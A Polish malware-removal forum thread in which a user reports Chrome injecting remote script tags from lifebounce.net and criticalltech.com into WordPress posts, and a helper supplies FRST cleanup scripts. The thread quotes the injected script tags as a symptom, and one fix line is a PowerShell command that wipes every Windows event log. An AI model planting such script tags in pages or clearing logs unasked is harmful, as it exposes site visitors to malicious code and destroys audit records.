Dziwny problem - lifebounce.net - malware-gen

[kapees 0]

Witam,

 

Od jakiegoś czasu, jestem katowany jakimiś powiadomieniami o lifebounce.net, nie wiem co to jest,

ale avast ciągle to wykrywa.

 

Jest jeszcze jedna ciekawostka.

 

Jak dodaje coś na stronę w wordpresie to do każdego bloku tekstowego dorzuca mi taki skrypt:

 

<script src="//lifebounce.net/1f9f5ee62aefca3cb1.js" async="" type="text/javascript"></script><script src="https://criticalltech.com/optout/set/lat?jsonp=__mtz_cb_961933784&key=1f9f5ee62aefca3cb1&cv=1576401238&t=1576401237963" type="text/javascript"></script><script src="https://criticalltech.com/optout/set/lt?jsonp=__mtz_cb_456350096&key=1f9f5ee62aefca3cb1&cv=11063&t=1576401237964" type="text/javascript"></script>

 

Jak robię to samo na firefox nic się nie dodaje.

 

Proszę o pomoc, bo nie wiem co z tym zrobić.

 

Plik addition: https://pastebin.com/JetyASKw

 

Plik Shortcut: https://pastebin.com/TnTWeEFf

 

Pozdrawiam

Krzysiek

FRST.txt

[filutka78 11]

W logach nie ma niczego podejrzanego.

 

Tylko kosmetyka:

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

RemoveDirectory: C:\Users\kps\AppData\Roaming\Search Protection

RemoveDirectory: C:\Users\kps\AppData\Roaming\Yontoo

Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}

FirewallRules: [{090D77D1-625A-4D2E-969D-7EF7603902B4}] => (Allow) C:\Users\kps\AppData\Roaming\Zoom\bin\airhost.exe Brak pliku

FirewallRules: [{11AA4855-13E8-4FBD-AA63-A681B9D93F89}] => (Allow) C:\Program Files\KeyShot5\bin\keyshot5.exe Brak pliku

FirewallRules: [{C7A98B0D-2B70-4F06-BD29-E4C8B58A1867}] => (Allow) C:\Program Files\KeyShot5\bin\keyshot_daemon.exe Brak pliku

FirewallRules: [{AD5C1E10-D6E0-44C7-A73D-C21D9E33CA4E}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe Brak pliku

FirewallRules: [{7A7F9170-C371-49D8-A15F-67CC3ED144CB}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe Brak pliku

FirewallRules: [{E138BB57-D9D5-43F9-BDD1-354F258E4D8A}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe Brak pliku

FirewallRules: [{B84626AE-ADA4-4C24-8CB0-70693D114B96}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe Brak pliku

FirewallRules: [{B4438375-205A-4900-9320-68F4564C69B8}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Brak pliku

FirewallRules: [{01A5AC70-F18C-430C-B04B-BEDE8696B85B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Brak pliku

FirewallRules: [TCP Query User{066E4F19-52A3-42A3-8055-91D1E71AD355}C:\xampp\mercurymail\mercury.exe] => (Allow) C:\xampp\mercurymail\mercury.exe Brak pliku

FirewallRules: [uDP Query User{FCD4CBE4-840D-448A-AF5E-BF97D14C5D83}C:\xampp\mercurymail\mercury.exe] => (Allow) C:\xampp\mercurymail\mercury.exe Brak pliku

FirewallRules: [{329C0A98-C7C0-4D67-990C-65B6B691EFFC}] => (Allow) C:\Users\kps\AppData\Roaming\Spotify\spotify.exe Brak pliku

FirewallRules: [{3BE1A80B-B1EC-4DDE-9826-3723D0A0E374}] => (Allow) C:\Users\kps\AppData\Roaming\Spotify\spotify.exe Brak pliku

FirewallRules: [{0AB98311-2ED2-4B9A-92B4-C8C804B39029}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe Brak pliku

FirewallRules: [{3AD67A7F-5364-4BE0-AA0E-7F6BC10650D5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe Brak pliku

FirewallRules: [{D418C6F6-CC98-462F-B691-1BC02EE37911}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe Brak pliku

FirewallRules: [{DC59B32B-9128-46DF-AD41-4A4F627349BB}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe Brak pliku

FirewallRules: [{A6795F4C-9527-4D8C-8E1E-4095434ACC51}] => (Allow) C:\Program Files (x86)\Trademanager\AliIM.exe Brak pliku

FirewallRules: [{AEE901BC-FBAA-49D6-A024-5AAA365C3F8D}] => (Allow) C:\Program Files (x86)\Trademanager\AliIM.exe Brak pliku

FirewallRules: [TCP Query User{D26191C1-EA58-46EE-8835-298E6781A31B}C:\program files (x86)\trademanager\aliim.exe] => (Allow) C:\program files (x86)\trademanager\aliim.exe Brak pliku

FirewallRules: [uDP Query User{BF96E82C-82AB-4CA0-967A-E28FFFD18153}C:\program files (x86)\trademanager\aliim.exe] => (Allow) C:\program files (x86)\trademanager\aliim.exe Brak pliku

FirewallRules: [TCP Query User{2EBD5DD4-7B7A-4929-AC91-5DEAB8ED4A55}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe Brak pliku

FirewallRules: [uDP Query User{AE698747-9873-4409-BF80-53C4344FCB0B}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe Brak pliku

FirewallRules: [TCP Query User{1370C1A1-951F-4C33-AAD0-2063F31664B4}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe Brak pliku

FirewallRules: [uDP Query User{BCF736FB-B343-4CFD-8BEA-D0203C0106EF}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe Brak pliku

FirewallRules: [TCP Query User{0373D411-DF15-40C2-AB10-687358545962}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe Brak pliku

FirewallRules: [uDP Query User{D4F10A16-154A-44CF-B11B-817702BA1017}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe Brak pliku

FirewallRules: [TCP Query User{5C840866-5202-4CE9-8E13-D75E73F19D6F}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe Brak pliku

FirewallRules: [uDP Query User{A4D74A3A-ACC4-403E-AE56-BE9597C36170}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe Brak pliku

MSCONFIG\startupreg: Yontoo Desktop => "C:\Users\kps\AppData\Roaming\Yontoo\YontooDesktop.exe"

MSCONFIG\startupreg: SearchProtection => "C:\Users\kps\AppData\Roaming\Search Protection\SearchProtection.EXE" /autostart

Task: {5C9CDCCC-E7F4-4443-B710-FCF8108B5C65} - System32\Tasks\{ABBF335E-C140-46E1-B5B4-D2900D2BC0F7} => C:\Windows\system32\pcalua.exe -a E:\Programy\instalki\xampp-win32-1.7.4-VC6-installer.exe -d E:\Programy\instalki

Task: {8F6F2540-5F2C-4D5D-A209-48978A4C3F02} - System32\Tasks\{F3C4356F-A9D8-468A-9940-B44EBAE05607} => C:\Windows\system32\pcalua.exe -a "C:\Users\kps\Desktop\JRE - Flip Installer - 3.4.7.112.exe" -d C:\Users\kps\Desktop

Task: {C564BD26-B060-4935-9DE9-DEA35E7B67A3} - System32\Tasks\{BC73714B-0B37-4F82-87F9-D21BCFD8D748} => C:\Windows\system32\pcalua.exe -a "C:\Users\kps\Desktop\Hp drivery\sp48432 - chipset instal utility.exe" -d "C:\Users\kps\Desktop\Hp drivery"

URLSearchHook: [s-1-5-21-382856504-3390691762-2710609008-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12152019093740585] UWAGA => Brak domyślnego URLSearchHook

Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku

FF Plugin HKU\S-1-5-21-382856504-3390691762-2710609008-1000: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [brak pliku]

FF Plugin HKU\S-1-5-21-382856504-3390691762-2710609008-1000: @alibaba.com/npAliSSOLogin;version=1.0 -> C:\Program Files (x86)\Trademanager\npAliSSOLogin.dll [brak pliku]

CHR Session Restore: Default -> [funkcja włączona]

S3 WacHidRouter; system32\DRIVERS\wachidrouter.sys [X]

S3 wacomrouterfilter; system32\DRIVERS\wacomrouterfilter.sys [X]

EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

 

F.

[kapees 0]

Dzięki za szybką odpowiedź.

 

Zrobiłem to o czym mówiłaś, załączam nowy log.

 

https://pastebin.com/HYgqu94q

Edytowane 15 Grudnia 2019 przez kapees

[kapees 0]

Właśnie przed chwilą, znowu wyskoczył mi ten komunikat:

 

[filutka78 11]

Tylko kosmetyka:

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

RemoveDirectory: C:\ProgramData\boost_interprocess

S3 WacHidRouter; system32\DRIVERS\wachidrouter.sys [X]

S3 wacomrouterfilter; system32\DRIVERS\wacomrouterfilter.sys [X]

Task: {8F6F2540-5F2C-4D5D-A209-48978A4C3F02} - System32\Tasks\{F3C4356F-A9D8-468A-9940-B44EBAE05607} => C:\Windows\system32\pcalua.exe -a "C:\Users\kps\Desktop\JRE - Flip Installer - 3.4.7.112.exe" -d C:\Users\kps\Desktop

Task: {5C9CDCCC-E7F4-4443-B710-FCF8108B5C65} - System32\Tasks\{ABBF335E-C140-46E1-B5B4-D2900D2BC0F7} => C:\Windows\system32\pcalua.exe -a E:\Programy\instalki\xampp-win32-1.7.4-VC6-installer.exe -d E:\Programy\instalki

EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

 

Ponieważ Avast wykrył to w Chrome, to przeinstaluj tę przeglądarkę.

 

F.

 

. 111

. .

Edytowane 27 Grudnia 2019 przez filutka78

[kapees 0]

Cześć Filutka,

 

Dzięki za pomoc.

Przepraszam że tak długo mi zeszło z kolejnym działaniem.

 

W końcu po nowym roku udało mi się to zrobić:

 

https://pastebin.com/t7ZEWxxt

 

Chroma jeszcze nie przeinstalowałem bo muszę ogarnąć jak nie stracić wszystkich haseł, histori, autouzupełnień itp.

 

Zrobię to na dniach.

 

Pozdrawiam!